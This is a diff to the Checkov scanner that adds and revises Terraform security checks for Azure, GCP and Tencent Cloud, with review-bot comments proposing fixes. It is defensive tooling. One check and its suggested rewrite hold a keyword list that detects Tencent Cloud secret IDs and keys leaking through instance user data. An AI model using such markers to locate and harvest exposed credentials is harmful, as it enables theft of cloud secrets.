diff --git a/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py b/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py index f79c9f79217..357af9c78fd 100644 --- a/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py +++ b/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py @@ -5,7 +5,7 @@ class DatabricksWorkspaceIsNotPublic(BaseResourceNegativeValueCheck): def __init__(self): - name = "Ensure that databricks workspace is not public" + name = "Ensure Databricks Workspace data plane to control plane communication happens over private link" id = "CKV_AZURE_158" supported_resources = ['azurerm_databricks_workspace'] categories = [CheckCategories.NETWORKING] diff --git a/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py b/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py index 73590c14acd..35798e5123b 100644 --- a/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py +++ b/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py @@ -38,6 +38,13 @@ def scan_resource_conf(self, conf) -> CheckResult: ip_rules = ip_rules[0] if ip_rules and isinstance(ip_rules, list) else ip_rules if ip_rules: return CheckResult.PASSED + virtual_network_subnet_ids = network_acl.get("virtual_network_subnet_ids") + # Get first element in virtual_network_subnet_ids (as parser wrap it with list). + virtual_network_subnet_ids = virtual_network_subnet_ids[0] \ + if virtual_network_subnet_ids and isinstance(virtual_network_subnet_ids, list) \ + else virtual_network_subnet_ids + if virtual_network_subnet_ids: + return CheckResult.PASSED return CheckResult.FAILED diff --git a/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py b/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py index c624fb2aef6..eac3216bcf5 100644 
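Review bot: The new `virtual_network_subnet_ids` block repeats the unwrap-first-element idiom used for `ip_rules` two lines above, now with a three-line backslash continuation; a small module-level helper (e.g. `def _unwrap(value): return value[0] if value and isinstance(value, list) else value`) would serve both and read as `if _unwrap(network_acl.get("virtual_network_subnet_ids")): return CheckResult.PASSED`. The comment should read `# Unwrap the first element (the parser wraps attribute values in a list).` scan_resource_conf begins outside the hunk.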
--- a/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py +++ b/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py @@ -2,11 +2,11 @@ from typing import Any -from checkov.common.models.enums import CheckCategories, CheckResult -from checkov.terraform.checks.resource.base_resource_negative_value_check import BaseResourceNegativeValueCheck +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck -class StorageAccountDisablePublicAccess(BaseResourceNegativeValueCheck): +class StorageAccountDisablePublicAccess(BaseResourceValueCheck): def __init__(self) -> None: name = "Ensure that Storage accounts disallow public access" id = "CKV_AZURE_59" @@ -17,14 +17,13 @@ def __init__(self) -> None: id=id, categories=categories, supported_resources=supported_resources, - missing_attribute_result=CheckResult.FAILED, ) def get_inspected_key(self) -> str: return "public_network_access_enabled" - def get_forbidden_values(self) -> list[Any]: - return [True] + def get_expected_values(self) -> list[Any]: + return [False] check = StorageAccountDisablePublicAccess() diff --git a/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py b/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py index d65fb174416..b50eb9cb5c4 100644 --- a/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py +++ b/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py 
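Review bot: Switching to BaseResourceValueCheck drops the explicit `missing_attribute_result=CheckResult.FAILED`, so the verdict for a storage account that omits `public_network_access_enabled` now depends on the value-check base class's default for a missing attribute; as far as I know the provider default for this attribute is true, so a missing attribute must still FAIL. State that explicitly instead of inheriting it — `missing_block_result=CheckResult.FAILED` in the `super().__init__` call — with a comment naming the provider default. The same applies to StorageBlobRestrictPublicAccess (`allow_nested_items_to_be_public`) in the next hunk.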
@@ -2,11 +2,11 @@ from typing import Any -from checkov.common.models.enums import CheckCategories, CheckResult -from checkov.terraform.checks.resource.base_resource_negative_value_check import BaseResourceNegativeValueCheck +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck -class StorageBlobRestrictPublicAccess(BaseResourceNegativeValueCheck): +class StorageBlobRestrictPublicAccess(BaseResourceValueCheck): def __init__(self) -> None: name = "Ensure that Storage blobs restrict public access" id = "CKV_AZURE_190" @@ -17,14 +17,13 @@ def __init__(self) -> None: id=id, categories=categories, supported_resources=supported_resources, - missing_attribute_result=CheckResult.FAILED, ) def get_inspected_key(self) -> str: return "allow_nested_items_to_be_public" - def get_forbidden_values(self) -> list[Any]: - return [True] + def get_expected_values(self) -> list[Any]: + return [False] check = StorageBlobRestrictPublicAccess() diff --git a/checkov/terraform/checks/resource/azure/SynapseSQLPoolDataEncryption.py b/checkov/terraform/checks/resource/azure/SynapseSQLPoolDataEncryption.py new file mode 100644 index 00000000000..75dc5d096eb --- /dev/null +++ b/checkov/terraform/checks/resource/azure/SynapseSQLPoolDataEncryption.py 
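Review bot: Same concern as for CKV_AZURE_59: `allow_nested_items_to_be_public` defaults to `true` in azurerm, so removing the explicit `missing_attribute_result=CheckResult.FAILED` is only safe if BaseResourceValueCheck's own missing-attribute default is FAILED — confirm that, or keep the argument and add `# provider default is true (public), so absence must fail`. Unresolved values (`var.x`) previously passed the negative check and will now be judged against a literal `False`; document that change for users.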
@@ -0,0 +1,19 @@ +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck + + +class SynapseSQLPoolDataEncryption(BaseResourceCheck): + def __init__(self): + name = "Ensure Synapse SQL pools are encrypted" + id = "CKV_AZURE_241" + supported_resources = ['azurerm_synapse_sql_pool'] + categories = [CheckCategories.ENCRYPTION] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf): + if 'data_encrypted' in conf and conf['data_encrypted'][0] is True: + return CheckResult.PASSED + return CheckResult.FAILED + + +check = SynapseSQLPoolDataEncryption() diff --git a/checkov/terraform/checks/resource/azure/SynapseWorkspaceAdministratorLoginPasswordHidden.py b/checkov/terraform/checks/resource/azure/SynapseWorkspaceAdministratorLoginPasswordHidden.py new file mode 100644 index 00000000000..7eec03bc0bd --- /dev/null +++ b/checkov/terraform/checks/resource/azure/SynapseWorkspaceAdministratorLoginPasswordHidden.py @@ -0,0 +1,19 @@ +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck + + +class SynapseWorkspaceAdministratorLoginPasswordHidden(BaseResourceCheck): + def __init__(self): + name = "Ensure Azure Synapse Workspace administrator login password is not exposed" + id = "CKV_AZURE_239" + supported_resources = ['azurerm_synapse_workspace'] + categories = [CheckCategories.SECRETS] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf): + if 'sql_administrator_login_password' in conf: + return CheckResult.FAILED + return CheckResult.PASSED + + +check = SynapseWorkspaceAdministratorLoginPasswordHidden() 
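Review bot: SynapseSQLPoolDataEncryption hand-rolls what BaseResourceValueCheck already does, which makes it inconsistent with SynapseWorkspaceCMKEncryption added in the same commit and leaves the report without evaluated keys; rewrite it as a value check with `def get_inspected_key(self): return "data_encrypted"` and `def get_expected_value(self): return True`. That also removes the bare `conf['data_encrypted'][0]`, which raises IndexError on an empty list instead of returning a result. A short docstring stating that `data_encrypted` is the provider's transparent-data-encryption flag and that its absence is treated as disabled would help reviewers.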
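Review bot: SynapseWorkspaceAdministratorLoginPasswordHidden fails on the mere presence of `sql_administrator_login_password`, not on a hardcoded value, so a workspace that correctly feeds the password from a variable or a Key Vault secret reference is flagged exactly like a literal; since the attribute has to be set whenever `sql_administrator_login` is used, the check effectively fails every SQL-admin-enabled workspace and will be suppressed wholesale, which defeats its purpose. Inspect the value and only fail on a plain literal, e.g. `value = conf.get('sql_administrator_login_password', [None])[0]` / `if isinstance(value, str) and not value.startswith("${"):` / `return CheckResult.FAILED`. How the parser represents unresolved references (I believe as `${...}` strings) should be confirmed before relying on that prefix test.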
diff --git a/checkov/terraform/checks/resource/azure/SynapseWorkspaceCMKEncryption.py b/checkov/terraform/checks/resource/azure/SynapseWorkspaceCMKEncryption.py new file mode 100644 index 00000000000..3de1bddc4a6 --- /dev/null +++ b/checkov/terraform/checks/resource/azure/SynapseWorkspaceCMKEncryption.py @@ -0,0 +1,21 @@ +from checkov.common.models.consts import ANY_VALUE +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.enums import CheckCategories + + +class SynapseWorkspaceCMKEncryption(BaseResourceValueCheck): + def __init__(self): + name = "Ensure Azure Synapse Workspace is encrypted with a CMK" + id = "CKV_AZURE_240" + supported_resources = ['azurerm_synapse_workspace'] + categories = [CheckCategories.ENCRYPTION] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self): + return "customer_managed_key/[0]/key_name" + + def get_expected_value(self): + return ANY_VALUE + + +check = SynapseWorkspaceCMKEncryption() diff --git a/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py b/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py index 0eb47728b0a..0a1f0895545 100644 --- a/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py +++ b/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py 
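Review bot: Inspecting `customer_managed_key/[0]/key_name` makes CKV_AZURE_240 fail for workspaces that configure a CMK with only the required `key_versionless_id`, because `key_name` is optional in the azurerm `customer_managed_key` block (as far as I recall it defaults to "cmk" when omitted). Inspect the required attribute instead: `return "customer_managed_key/[0]/key_versionless_id"`. A docstring should also say that the check only establishes that a CMK block is present, not anything about key rotation or the key's access policy.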
@@ -25,14 +25,19 @@ def scan_resource_conf(self, conf: Dict[str, List[Any]]) -> CheckResult: match = rule.get("match") if match and isinstance(match, list): expr = match[0].get("expr") - if expr and isinstance(expr[0], dict) and expr[0].get("expression") == ["evaluatePreconfiguredExpr('cve-canary')"]: - if rule.get("action") == ["allow"]: - return CheckResult.FAILED - if rule.get("preview") == [True]: - return CheckResult.FAILED - - return CheckResult.PASSED - + if expr and isinstance(expr[0], dict): + if expr[0].get("expression") == ["evaluatePreconfiguredExpr('cve-canary')"]: + if rule.get("action") == ["allow"]: + return CheckResult.FAILED + if rule.get("preview") == [True]: + return CheckResult.FAILED + return CheckResult.PASSED + elif expr[0].get("expression") == ["evaluatePreconfiguredWaf('cve-canary')"]: + if rule.get("action") == ["allow"]: + return CheckResult.FAILED + if rule.get("preview") == [True]: + return CheckResult.FAILED + return CheckResult.PASSED return CheckResult.FAILED diff --git a/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py b/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py new file mode 100644 index 00000000000..7e4fd15bff5 --- /dev/null +++ b/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py 
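Review bot: Both branches compare the expression against an exact one-element list, so the documented Cloud Armor form with a sensitivity argument, `evaluatePreconfiguredWaf('cve-canary', {'sensitivity': 1})`, does not match and the policy is reported FAILED even though the Log4Shell rule is active. A containment test over the expression string covers both spellings and the argument form, and removes the allow/preview handling that is now duplicated verbatim: `expression = expr[0].get("expression")` / `if expression and isinstance(expression, list) and "cve-canary" in str(expression[0]):`. `scan_resource_conf` begins outside this hunk.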
@@ -0,0 +1,25 @@ +from typing import Any, List + +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck + + +class CloudFunctionPermissiveIngress(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure GCP Cloud Function is not configured with overly permissive Ingress setting" + id = "CKV_GCP_124" + supported_resources = ("google_cloudfunctions_function", "google_cloudfunctions2_function") + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + if self.entity_type == "google_cloudfunctions_function": + return "ingress_settings" + else: + return "service_config/[0]/ingress_settings/[0]" + + def get_expected_values(self) -> List[Any]: + return ["ALLOW_INTERNAL_AND_GCLB", "ALLOW_INTERNAL_ONLY"] + + +check = CloudFunctionPermissiveIngress() diff --git a/checkov/terraform/checks/resource/gcp/GKEBasicAuth.py b/checkov/terraform/checks/resource/gcp/GKEBasicAuth.py deleted file mode 100644 index d14200351dc..00000000000 --- a/checkov/terraform/checks/resource/gcp/GKEBasicAuth.py +++ /dev/null 
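Review bot: The gen2 key `service_config/[0]/ingress_settings/[0]` carries a trailing `/[0]` while the gen1 key and the other paths in this commit (`customer_managed_key/[0]/key_name`) do not; please confirm the base class path resolver tolerates the trailing index, otherwise gen2 functions will never resolve and always fail. A why-comment would also help here: `# ingress_settings defaults to ALLOW_ALL, so a missing attribute is correctly reported as FAILED` (assuming the base class keeps its missing-attribute default).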
@@ -1,37 +0,0 @@ -from __future__ import annotations - -from typing import Any - -from checkov.common.models.enums import CheckResult, CheckCategories -from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck - - -class GKEBasicAuth(BaseResourceCheck): - def __init__(self) -> None: - name = "Ensure GKE basic auth is disabled" - id = "CKV_GCP_19" - supported_resources = ('google_container_cluster',) - categories = (CheckCategories.KUBERNETES,) - super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) - - def scan_resource_conf(self, conf: dict[str, list[Any]]) -> CheckResult: - # since GKE 1.19 the usage of basic auth is deprecated and in the provider version 4+ removed - master_auth = conf.get("master_auth") - if master_auth and isinstance(master_auth, list): - username = master_auth[0].get('username') - password = master_auth[0].get('password') - if username or password: - # only if both are set to the empty string it is fine - # https://registry.terraform.io/providers/hashicorp/google/3.90.1/docs/resources/container_cluster.html - if username and password: - if username[0] == '' and password[0] == '': - return CheckResult.PASSED - return CheckResult.FAILED - - return CheckResult.PASSED - - def get_evaluated_keys(self) -> list[str]: - return ['master_auth/[0]/username', 'master_auth/[0]/password'] - - -check = GKEBasicAuth() diff --git a/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py b/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py index 1b69dc80862..3ed265a138c 100644 --- a/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py +++ b/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py 
@@ -18,7 +18,7 @@ def scan_resource_conf(self, conf: Dict[str, List[Any]]) -> CheckResult: return CheckResult.UNKNOWN stack = conf.get("stack_type") - if stack and isinstance(stack, list) and stack[0] != "IPV4_IPV6": + if not stack or (stack and isinstance(stack, list) and stack[0] != "IPV4_IPV6"): return CheckResult.UNKNOWN return super().scan_resource_conf(conf) diff --git a/checkov/terraform/checks/resource/tencentcloud/CBSEncryption.py b/checkov/terraform/checks/resource/tencentcloud/CBSEncryption.py new file mode 100644 index 00000000000..9630077082f --- /dev/null +++ b/checkov/terraform/checks/resource/tencentcloud/CBSEncryption.py @@ -0,0 +1,23 @@ +from typing import Any, List + +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_value_check import \ + BaseResourceValueCheck + + +class CBSEncryption(BaseResourceValueCheck): + def __init__(self): + name = "Ensure Tencent Cloud CBS is encrypted" + id = "CKV_TC_1" + supported_resources = ['tencentcloud_cbs_storage'] + categories = [CheckCategories.ENCRYPTION] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self): + return 'encrypt' + + def get_expected_value(self) -> List[Any]: + return True + + +check = CBSEncryption() diff --git a/checkov/terraform/checks/resource/tencentcloud/CDBInternetService.py b/checkov/terraform/checks/resource/tencentcloud/CDBInternetService.py new file mode 100644 index 00000000000..93f5b43922a --- /dev/null +++ b/checkov/terraform/checks/resource/tencentcloud/CDBInternetService.py 
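Review bot: The rewritten condition repeats the `stack and` test that `not stack or` already settles; `if not stack or (isinstance(stack, list) and stack[0] != "IPV4_IPV6"):` reads the same and drops the redundancy. The reason a missing `stack_type` yields UNKNOWN is not stated — presumably a subnet without it is IPv4-only so private IPv6 access does not apply — and a one-line comment saying so would save the next reader a provider lookup.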
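Review bot: In CBSEncryption `get_expected_value` is annotated `-> List[Any]` but returns the bare `True`; the annotation should be `-> bool`, after which the `Any, List` import is unused. The key `'encrypt'` also differs from the `attr/[0]` convention every other new tencentcloud check uses (`allocate_public_ip/[0]`, `enable/[0]`); pick whichever form the base class expects and use it consistently across the new directory.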
@@ -0,0 +1,23 @@ +from typing import Any, List + +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_negative_value_check import \ + BaseResourceNegativeValueCheck + + +class CDBInternetService(BaseResourceNegativeValueCheck): + def __init__(self): + name = "Ensure Tencent Cloud mysql instances do not enable access from public networks" + id = "CKV_TC_9" + supported_resources = ['tencentcloud_mysql_instance'] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return 'internet_service/[0]' + + def get_forbidden_values(self) -> List[Any]: + return [1] + + +check = CDBInternetService() diff --git a/checkov/terraform/checks/resource/tencentcloud/CDBIntranetPort.py b/checkov/terraform/checks/resource/tencentcloud/CDBIntranetPort.py new file mode 100644 index 00000000000..91f33644100 --- /dev/null +++ b/checkov/terraform/checks/resource/tencentcloud/CDBIntranetPort.py @@ -0,0 +1,23 @@ +from typing import Any, List + +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_negative_value_check import \ + BaseResourceNegativeValueCheck + + +class CDBIntranetPort(BaseResourceNegativeValueCheck): + def __init__(self): + name = "Ensure Tencent Cloud MySQL instances intranet ports are not set to the default 3306" + id = "CKV_TC_10" + supported_resources = ['tencentcloud_mysql_instance'] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return 'intranet_port/[0]' + + def get_forbidden_values(self) -> List[Any]: + return [3306] + + +check = CDBIntranetPort() 
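Review bot: CDBIntranetPort only fails on an explicit `intranet_port = 3306`; a resource that omits the attribute gets the provider default of 3306 yet passes, assuming BaseResourceNegativeValueCheck treats a missing attribute as PASSED (its usual default). Pass `missing_attribute_result=CheckResult.FAILED` to `super().__init__` with a comment naming the provider default. A docstring should also set expectations that a non-default port is obscurity, not a substitute for the `internet_service` and security-group checks.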
diff --git a/checkov/terraform/checks/resource/tencentcloud/CLBInstanceLog.py b/checkov/terraform/checks/resource/tencentcloud/CLBInstanceLog.py new file mode 100644 index 00000000000..182d63501be --- /dev/null +++ b/checkov/terraform/checks/resource/tencentcloud/CLBInstanceLog.py @@ -0,0 +1,20 @@ +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.terraform.checks.resource.base_resource_value_check import \ + BaseResourceCheck + + +class CLBInstanceLog(BaseResourceCheck): + def __init__(self): + name = "Ensure Tencent Cloud CLB has a logging ID and topic" + id = "CKV_TC_11" + supported_resources = ['tencentcloud_clb_instance'] + categories = [CheckCategories.LOGGING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf) -> CheckResult: + if conf.get("log_set_id") is None or conf.get("log_topic_id") is None: + return CheckResult.FAILED + return CheckResult.PASSED + + +check = CLBInstanceLog() diff --git a/checkov/terraform/checks/resource/tencentcloud/CLBListenerProtocol.py b/checkov/terraform/checks/resource/tencentcloud/CLBListenerProtocol.py new file mode 100644 index 00000000000..41d35613e3a --- /dev/null +++ b/checkov/terraform/checks/resource/tencentcloud/CLBListenerProtocol.py 
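Review bot: CLBInstanceLog imports `BaseResourceCheck` through `base_resource_value_check`, which only works because that module happens to re-export it; import it from its home, `from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck`, as the azure checks in this commit do (the same indirection appears in the other new tencentcloud BaseResourceCheck files). Adding `def get_evaluated_keys(self): return ["log_set_id", "log_topic_id"]` would let the report point at the missing attributes.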
@@ -0,0 +1,23 @@ +from typing import Any, List + +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_negative_value_check import \ + BaseResourceNegativeValueCheck + + +class CLBListenerProtocol(BaseResourceNegativeValueCheck): + def __init__(self): + name = "Ensure Tencent Cloud CLBs use modern, encrypted protocols" + id = "CKV_TC_12" + supported_resources = ['tencentcloud_clb_listener'] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return 'protocol/[0]' + + def get_forbidden_values(self) -> List[Any]: + return ["TCP", "UDP", "HTTP"] + + +check = CLBListenerProtocol() diff --git a/checkov/terraform/checks/resource/tencentcloud/CVMAllocatePublicIp.py b/checkov/terraform/checks/resource/tencentcloud/CVMAllocatePublicIp.py new file mode 100644 index 00000000000..58a5e8afe7a --- /dev/null +++ b/checkov/terraform/checks/resource/tencentcloud/CVMAllocatePublicIp.py @@ -0,0 +1,23 @@ +from typing import Any, List + +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_negative_value_check import \ + BaseResourceNegativeValueCheck + + +class CVMAllocatePublicIp(BaseResourceNegativeValueCheck): + def __init__(self): + name = "Ensure Tencent Cloud CVM instance does not allocate a public IP" + id = "CKV_TC_2" + supported_resources = ['tencentcloud_instance'] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return 'allocate_public_ip/[0]' + + def get_forbidden_values(self) -> List[Any]: + return [True] + + +check = CVMAllocatePublicIp() 
diff --git a/checkov/terraform/checks/resource/tencentcloud/CVMDisableMonitorService.py b/checkov/terraform/checks/resource/tencentcloud/CVMDisableMonitorService.py new file mode 100644 index 00000000000..e39728ad46f --- /dev/null +++ b/checkov/terraform/checks/resource/tencentcloud/CVMDisableMonitorService.py @@ -0,0 +1,23 @@ +from typing import Any, List + +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_negative_value_check import \ + BaseResourceNegativeValueCheck + + +class CVMDisableMonitorService(BaseResourceNegativeValueCheck): + def __init__(self): + name = "Ensure Tencent Cloud CVM monitor service is enabled" + id = "CKV_TC_3" + supported_resources = ['tencentcloud_instance'] + categories = [CheckCategories.LOGGING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return 'disable_monitor_service/[0]' + + def get_forbidden_values(self) -> List[Any]: + return [True] + + +check = CVMDisableMonitorService() diff --git a/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultSecurityGroup.py b/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultSecurityGroup.py new file mode 100644 index 00000000000..54bc61f6dc2 --- /dev/null +++ b/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultSecurityGroup.py 
@@ -0,0 +1,27 @@ +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.terraform.checks.resource.base_resource_value_check import \ + BaseResourceCheck + + +class CVMUseDefaultSecurityGroup(BaseResourceCheck): + def __init__(self): + name = "Ensure Tencent Cloud CVM instances do not use the default security group " + id = "CKV_TC_4" + supported_resources = ['tencentcloud_instance'] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: dict) -> CheckResult: + if conf.get("orderly_security_groups"): + for osg in conf["orderly_security_groups"][0]: + if ".default." in osg: + return CheckResult.FAILED + + if conf.get("security_groups"): + for sg in conf["security_groups"][0]: + if ".default." in sg: + return CheckResult.FAILED + return CheckResult.PASSED + + +check = CVMUseDefaultSecurityGroup() diff --git a/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultVPC.py b/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultVPC.py new file mode 100644 index 00000000000..b3e3c94375a --- /dev/null +++ b/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultVPC.py 
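Review bot: The `".default." in osg` heuristic matches the Terraform resource name (`tencentcloud_security_group.default.id`), not Tencent's actual default security group: an instance attached to the real default group by literal ID or through a data source is not caught, while a team that names its hardened group `default` is flagged. Document the heuristic and its limits in the class docstring, and consider matching a default-security-group data source if the provider exposes one. The loops also assume a list: an unresolved `${var.sgs}` string would be iterated character by character, so an `isinstance(groups, list)` guard before `for osg in groups` keeps the intent explicit.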
@@ -0,0 +1,22 @@ +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.terraform.checks.resource.base_resource_value_check import \ + BaseResourceCheck + + +class CVMUseDefaultVPC(BaseResourceCheck): + def __init__(self): + name = "Ensure Tencent Cloud CVM instances do not use the default VPC" + id = "CKV_TC_5" + supported_resources = ['tencentcloud_instance'] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf) -> CheckResult: + if conf.get("vpc_id") and ".default." in conf["vpc_id"][0]: + return CheckResult.FAILED + if conf.get("subnet_id") and ".default." in conf["subnet_id"][0]: + return CheckResult.FAILED + return CheckResult.PASSED + + +check = CVMUseDefaultVPC() diff --git a/checkov/terraform/checks/resource/tencentcloud/CVMUserData.py b/checkov/terraform/checks/resource/tencentcloud/CVMUserData.py new file mode 100644 index 00000000000..d75be4576c9 --- /dev/null +++ b/checkov/terraform/checks/resource/tencentcloud/CVMUserData.py 
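Review bot: `".default." in conf["vpc_id"][0]` raises TypeError when the parsed value is not a string, which turns a malformed plan into a crashed check rather than an UNKNOWN result; guard it with `vpc_id = conf["vpc_id"][0]` / `if isinstance(vpc_id, str) and ".default." in vpc_id:`. As with the security-group check, this matches a Terraform resource named `default`, not the account's default VPC, and the docstring should say so.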
@@ -0,0 +1,22 @@ +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_value_check import ( + BaseResourceCheck, CheckResult) + + +class CVMUserData(BaseResourceCheck): + def __init__(self): + name = "Ensure Tencent Cloud CVM user data does not contain sensitive information" + id = "CKV_TC_13" + supported_resources = ['tencentcloud_instance'] + categories = [CheckCategories.GENERAL_SECURITY] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: dict) -> CheckResult: + if conf.get("user_data_raw") and ("TENCENTCLOUD_SECRET_ID" in conf["user_data_raw"][0] or "TENCENTCLOUD_SECRET_KEY" in conf["user_data_raw"][0]): + return CheckResult.FAILED + if conf.get("user_data") and ("TENCENTCLOUD_SECRET_ID" in conf["user_data"][0] or "TENCENTCLOUD_SECRET_KEY" in conf["user_data"][0]): + return CheckResult.FAILED + return CheckResult.PASSED + + +check = CVMUserData() diff --git a/checkov/terraform/checks/resource/tencentcloud/TKELogAgentEnabled.py b/checkov/terraform/checks/resource/tencentcloud/TKELogAgentEnabled.py new file mode 100644 index 00000000000..09e197d8ed7 --- /dev/null +++ b/checkov/terraform/checks/resource/tencentcloud/TKELogAgentEnabled.py @@ -0,0 +1,21 @@ +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_value_check import \ + BaseResourceValueCheck + + +class TKELogAgentEnable(BaseResourceValueCheck): + def __init__(self): + name = "Ensure Tencent Cloud TKE clusters enable log agent" + id = "CKV_TC_6" + supported_resources = ['tencentcloud_kubernetes_cluster'] + categories = [CheckCategories.LOGGING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self): + return "log_agent/enabled" + + def get_expected_value(self) -> bool: + return True + + +check = TKELogAgentEnable() 
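Review bot: The `user_data` branch searches the raw attribute, but per the provider schema `user_data` is base64-encoded (only `user_data_raw` is plain text), so the substring test on the encoded value can never match and that branch is dead — a leaked `TENCENTCLOUD_SECRET_KEY` passed through `user_data` is not detected. Decode before searching, falling back to the raw value when it is not valid base64 (an unresolved reference, for instance); this needs `base64` and `binascii` from the standard library at the top of the file. The marker list is also worth lifting to a class constant so it can grow beyond the two environment-variable names.
```python
    SENSITIVE_MARKERS = ("TENCENTCLOUD_SECRET_ID", "TENCENTCLOUD_SECRET_KEY")

    def scan_resource_conf(self, conf: dict) -> CheckResult:
        raw = conf.get("user_data_raw")
        if raw and isinstance(raw[0], str) and self._contains_secret(raw[0]):
            return CheckResult.FAILED
        encoded = conf.get("user_data")
        if encoded and isinstance(encoded[0], str):
            # user_data is base64 per the provider schema; search the decoded text and
            # fall back to the raw value when it is not valid base64 (e.g. an unresolved reference)
            try:
                decoded = base64.b64decode(encoded[0], validate=True).decode("utf-8", errors="ignore")
            except (binascii.Error, ValueError):
                decoded = encoded[0]
            if self._contains_secret(decoded):
                return CheckResult.FAILED
        return CheckResult.PASSED

    def _contains_secret(self, text: str) -> bool:
        return any(marker in text for marker in self.SENSITIVE_MARKERS)
```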
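Review bot: TKELogAgentEnable inspects `"log_agent/enabled"`, while every other nested-block path in this commit indexes the block (`customer_managed_key/[0]/key_name`, `service_config/[0]/ingress_settings`); if the resolver requires the index, the attribute is never found and every cluster is reported FAILED, including those with the agent enabled. Use `return "log_agent/[0]/enabled"` and add a test with `log_agent { enabled = true }` that expects PASSED. The class is named `TKELogAgentEnable` in a file called `TKELogAgentEnabled.py`; align the two.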
